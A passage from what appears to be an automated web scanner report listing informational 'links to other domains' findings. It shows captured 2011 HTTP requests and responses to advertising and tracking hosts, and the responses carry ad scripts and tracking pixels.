<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-78px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
<span class="is_c"><img class="is_img" onload="$Do.when('$IS.Init',0,this);" style="background-image:url(http&#58;//secure.wlxrs.com/&#36;live.controls.images/h/s7.png);background-position:-46px -8px;width:16px;height:16px;" src="http&#58;//secure.wlxrs.com/&#36;live.controls.images/is/invis.gif" alt=""/></span>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.wlxrs.com/YcXEoNNBYLrXXm83LmbiHw/liteframeworkex.js" ></script>
...[SNIP]...
</script><script type="text/javascript" src="http&#58;//js.wlxrs.com/q7c3F&#33;a9TdQSjcnoe8LBCw/shared.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://js.wlxrs.com/vTTGlFvxJ2FsHeDnpRRkOw/comscore/beacon.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=wldown&c5=&c6=&c15=&cv=1.3&cj=1"
style="display:none" width="0" height="0" alt="" />

</noscript>
...[SNIP]...

19.49. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1676624;type=page2292;cat=page2334;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4844245901331.306? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/hhs
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:49:54 GMT
Expires: Tue, 26 Apr 2011 18:49:54 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 904

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://ads.bluelithium.com/pixel?id=561188&t=2" width="1" height="1" />
<!-- Start Quantcast tag -->
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-1alT5ihT03xtM" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-1alT5ihT03xtM.gif?labels=_fp.channel.aptm,_fp.event.landingpage2" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
</noscript>
<!-- End Quantcast tag --><img src="http://switch.atdmt.com/action/DPM_UOP_RFIPage2" height="1" width="1"></body>
...[SNIP]...

19.50. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:45:53 GMT
Expires: Tue, 26 Apr 2011 18:45:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 3943

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script> var _l = 20
...[SNIP]...
</script><script type='text/javascript' src='http://js2.rfihub.com/js/bcC.js'></script>
<noscript><iframe src='http://a.rfihub.com/ca.html?rb=271&ca=1783' border='0' frameborder='0' vspace='0' hspace='0' scrolling='no' marginheight='0' marginwidth='0' style='display:none;padding:0;margin:0' width='0' height='0'></iframe></noscript><script type="text/javascript" src="http://pixel.mathtag.com/event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3="></script>
<img border="0" src="http://r.turn.com/r/beacon?b2=7zRdy3HvetQzzJrusGV0WgUYWXerDbWSrgMFxw-mCPoYOsR8WF6iMILz5GrRaTzYj9ILcvkNLozW5XfQm-OIAw&cid="><img src="http://segment-pixel.invitemedia.com/pixel?pixelID=50922&partnerID=249&key=segment" width="1" height="1" /><script type='text/javascript'>
...[SNIP]...
<noscript>
<img src="https://tracker.marinsm.com/tp?act=1&cid=4561iuf9g3q501317&script=no" >
</noscript><img src="http://ads.bluelithium.com/pixel?id=561187&t=2" width="1" height="1" /><script language= "JavaScript" type="text/javascript">
...[SNIP]...
</script><img height="1" width="1" src="http://view.atdmt.com/action/UOPA_LandingPage_1"/><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=unponl_cs=1&betq=8288=401583" width = "1" height = "1" border = "0">
<img src="http://ad.doubleclick.net/activity;src=1270268;dcnet=4155;boom=11427;sz=1x1;ord=1?"width=1 height=1 border=0><img src="http://b.collective-media.net/seg/cm/67k1ej" width="1" height="1" /><noscript>
...[SNIP]...
</noscript><img src="http://switch.atdmt.com/action/DRV_Univ_Phoenix_LP" height="1" width="1">
</body>
...[SNIP]...

19.51. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=6591672650538.385? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:39:32 GMT
Expires: Tue, 26 Apr 2011 18:39:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 486

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "TD Ameritrade" c/o "Neo@Ogilvy", segment: 'TDA - Invested Life - Content: No Archetype' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=40657&partnerID=9&clientID=1603&key=segment" width="1" height="1" />
<!-- End of pixel tag -->
...[SNIP]...

19.52. http://g.adspeed.net/ad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad.php?do=html&zid=14678&wd=728&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:37 GMT
Server: AdSpeed/s6
Content-Length: 789

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><script type="text/javascript"><!--
google_ad_client =
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.53. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303863078&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303845084441&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303845084448&frm=0&adk=1607234649&ga_vid=20532325.1303845084&ga_sid=1303845084&ga_hid=446774587&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1082&bih=954&eid=33895130&fu=0&ifi=1&dtd=18&xpc=2jgbyvk2b8&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:11:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7264

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3Dwww.WhiteHatSec.com%26adT%3DStung%2Bby%2Ba%2BWeb%2BScanner%253F%26adU%3Dwww.LowerMyBills.com%26adT%3DSee%2BTodays%2BMortgage%2BRates%26gl%3DUS&amp;usg=AFQjCNHxw5LxqoX7nAZlbts2bCmKpQ3FQw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

19.54. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303863134&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303845232862&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303845232969&frm=0&adk=1607234649&ga_vid=202673375.1303845233&ga_sid=1303845233&ga_hid=2076249241&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1066&bih=938&fu=0&ifi=1&dtd=170&xpc=LSGOSGg7Ox&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:13:43 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12516

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.dnsmadeeasy.com%26adT%3DDNS%2BMade%2BEasy%26adU%3Dwww.ArialSoftware.com%26adT%3DSend%2BDirect%2BEmail%26adU%3Dwww.Register.com%26adT%3DRegister%2BDomain%2BName%26gl%3DUS&amp;usg=AFQjCNHxRfvPQ1WXwBad3eCfvwi3xcaJqg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.55. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303863134&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303845179770&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303845179880&frm=0&adk=1607234649&ga_vid=688681181.1303845180&ga_sid=1303845180&ga_hid=1193285720&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1066&bih=938&fu=0&ifi=1&dtd=152&xpc=G6ZVTgRLy9&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:12:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%26gl%3DUS&amp;usg=AFQjCNGLAwMA9Aj8m-nWQCCzBe52ZyaUnw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

19.56. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-0078565546631069&output=html&h=90&slotname=0597910248&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583029&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303854583063&frm=1&adk=362780761&ga_vid=81945644.1303854583&ga_sid=1303854583&ga_hid=1074700742&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3993542599&fu=0&ifi=1&dtd=40 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 21:51:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4195

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://seclists.org/fulldisclosure/2011/Apr/388%26hl%3Den%26client%3Dca-pub-0078565546631069%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEWCmx7iCW0LwyhYvtQO2f70Rl9Gg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.57. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303863105&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303845115788&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303845115888&frm=0&adk=1607234649&ga_vid=964021623.1303845116&ga_sid=1303845116&ga_hid=2004125417&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1066&bih=938&eid=33895132&fu=0&ifi=1&dtd=441&xpc=5odCA6v11x&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:11:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7248

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.wct.com%26adT%3DOverland%2BStorage%2BSnap%26adU%3Dwww.NetworkAutomation.com/Scripting%26adT%3DScripting%2BMade%2BEasy%26adU%3Dwww.LowerMyBills.com%26adT%3DSee%2BTodays%2BMortgage%2BRates%26gl%3DUS&amp;usg=AFQjCNGgsCW2sk4QjMdkoF73cavgV07y7g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...

19.58. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-0078565546631069&output=html&h=600&slotname=9829251079&w=120&lmt=1303871408&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583034&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303854583065&frm=0&adk=3580742155&ga_vid=1704213550.1303854583&ga_sid=1303854583&ga_hid=204119268&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=937&fu=0&ifi=1&dtd=239&xpc=pmJcd9hAaJ&p=http%3A//seclists.org HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
